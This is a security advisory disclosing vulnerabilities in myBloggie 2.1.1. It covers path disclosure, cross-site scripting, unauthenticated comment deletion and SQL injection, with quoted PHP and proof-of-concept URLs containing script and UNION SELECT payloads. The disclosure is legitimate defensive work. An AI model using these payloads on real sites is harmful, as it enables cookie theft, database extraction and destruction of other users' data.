<<< Date Index >>>     <<< Thread Index >>>

Multiple vulnerabilities in myBloggie 2.1.1



******************************************************
* CODEBUG Labs
* Advisory #9
* Title: Multiple vulnerabilities in myBloggie 2.1.1
* Authors: Alberto Trivero & CorryL
* English Version: Alberto Trivero
* Product: myBloggie 2.1.1
* Type: Multiple Vulnerabilities
* Web: http://www.codebug.org/
******************************************************


--) Software Page (mybloggie.mywebland.com)

"myBloggie is considered one of the most simple, user-friendliest yet packed
with features
Weblog system available to date. Built using PHP & mySQL, web most popular
scripting
language & database system enable myBloggie to be installed in any
webservers."


--) Full Path Disclosure

Thanks to an improper sanitization of the post_id parameter, it's possible
to show the
full path by sending a simple request:

    http://www.example.com/mybloggie/index.php?mode=viewid&post_id='


--) Cross-Site Scripting (XSS)

Input passed to 'year' parameter in viewmode.php is not properly sanitised
before being
returned to users. This can be exploited execute arbitrary HTML and script
code in a
user's browser session in context of a vulnerable site with an URL like
this:


http://www.example.com/mybloggie/index.php?month_no=3&year=%3Cscript%3Ealert
(document.cookies)%3C/script%3E

Frequently, when there is an SQL syntax error, MySQL, in the HTML page,
report the value
of the parameter that caused the error without sanitization. So it's
possible tu inject
HTML code in some parameter like these:


http://www.example.com/mybloggie/index.php?mode=viewcat&cat_id=%3C%73%63%72%
69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2
9%3C%2F%73%63%72%69%70%74%3EC

http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=%3C%73%63
%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%
65%29%3C%2F%73%63%72%69%70%74%3E

http://www.example.com/mybloggie/index.php?mode=viewid&post_id=%3C%73%63%72%
69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2
9%3C%2F%73%63%72%69%70%74%3E

Note that this vulnerability it's only in part related to a iussue of the
blog.


--) Arbitrary Comment Deletion

Let's look at code from delcomment.php at line 31:

    <?
    ...
    if (isset($_GET['comment_id'])) $comment_id = $_GET['comment_id'];
    if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];

    if ($confirm=="") {
    message($lang['Confirm'], $lang['Msg_Del_error3']." <a class=\"std\"
href=\"".$_SERVER['PHP_SELF']."?mode=delcom&comment_id=".$comment_id."&confi
rm=yes\">".$lang['Yes']."</a>");
    }
    elseif ($confirm=="yes") {
    // Data Base Connection  //
    $sql = "DELETE FROM ".COMMENT_TBL." WHERE comment_id=$comment_id";
    $result = $db->sql_query($sql);
    $confirm ="";
    message($lang['Del'], $lang['Msg_Del']);
    }
    else message( $lang['Error'],$lang['Msg_Del_error2'] );
    ?>

This piece of code has the task of delete a comment of a post. Normally this
operation
can be do only by the administrator by click on a specific link that the
other users
can't view. But this URL can be created by any user and myBloggie doesn't
control if
the user that send the request has the privileges to do it. So anyone can
delete
comments of others users specifing the comment id with this URL:


http://www.example.com/mybloggie/index.php?mode=delcom&comment_id=[comment_i
d]&confirm=yes


--) SQL Injection

Let's look at code from search.php at line 62:

    <?
    ...
    $sql = "SELECT COUNT(a.post_id) AS num_posts
    FROM " . POST_TBL . " a
    WHERE a.subject like '%".$keyword."%' OR a.message like
'%".$keyword."%'" ;
    ...
    ?>

When myBloggie get the value of the 'keyword' parameter and put it in the
SQL query,
don't sanitise it. So a remote user can do SQL injection attacks. This is a
PoC URL:


http://www.example.com/mybloggie/index.php?mode=search&keyword=trivero%'%20U
NION%20SELECT%20null/*

These are other PoC URLs for other parameters:


http://www.example.com/mybloggie/index.php?month_no=1&year=1&mode=viewdate&d
ate_no=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,nul
l/*

http://www.example.com/mybloggie/index.php?mode=viewcat&cat_id=1%20UNION%20S
ELECT%20null,null,null,null,null,null,null,null,null,null/*

http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=1%20UNION
%20SELECT%20null,null,null,null,null,null,null,null,null,null/*

http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=1&year=1%
20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/*

http://www.example.com/mybloggie/index.php?mode=viewid&post_id=1%20UNION%20S
ELECT%20null,null,null,null,null,null,null,null,null,null/*


--) Patch

After the report to developer of the blog of these bugs, he realesed the
patches
available at this address: http://mywebland.com/forums/viewtopic.php?t=180


******************************************************
*        http://www.codebug.org/
******************************************************